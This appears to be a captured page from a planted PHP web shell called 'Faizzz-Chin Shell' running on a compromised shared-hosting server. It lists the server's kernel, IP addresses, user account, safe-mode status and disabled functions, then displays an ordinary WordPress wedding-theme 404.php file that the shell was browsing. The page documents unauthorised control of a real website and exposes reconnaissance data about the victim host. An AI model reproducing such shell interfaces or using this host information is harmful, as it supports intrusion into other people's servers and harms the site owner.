SHELL BYPASS 403 |
Modern UI. Responsive. Powerful.

Faizzz-Chin Shell

Uname\Kernel: Linux server.kxo.bgz.mybluehostin.me 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Server: Apache
PHP Version: 8.2.28 [ PHP INFO ]
Operating System: Linux
Server Ip: 162.240.163.222
Your Ip: 216.73.216.114
Date Time: 2025-07-10 17:13:39
User: dilseshaadi (1027) | Group: dilseshaadi (1027)
Safe Mode: OFF
Disable Function: exec,passthru,shell_exec,system

name : 404.php
<?php
// Look for custom 404 page, Apperance > Theme Options > Layout > Content / Page / Post : Custom 404 Page
$notfound_page_id = wedding_planner_get_option("page_404_page_id");
if((int)$notfound_page_id > 0 && get_page($notfound_page_id)) {
	wp_redirect(get_permalink($notfound_page_id));
	exit();
}

get_header(); 
?>
<div id="content">
	<div id="error404" class="post">
    	<span></span>
		<h1 class="content-color"><?php esc_attr_e('404!', 'wedding-planner'); ?></h1>
        <h2 class="content-color"><?php esc_attr_e('Sorry! That page doesn\'t seem to exist.', 'wedding-planner'); ?></h2>
        <p><?php esc_attr_e('Try clicking on the navigation to find what you\'re looking for.', 'wedding-planner'); ?></p>
        <p><a href="<?php echo esc_url(WEDDING_PLANNER_HOME_URL) ?>" class="generic-button generic-button-large"><?php esc_attr_e('Take Me Home', 'wedding-planner'); ?></a></p>
	</div><!--#error404 .post-->
</div><!--#content-->

<?php get_footer(); ?>
© 2025 Faizzz-Chin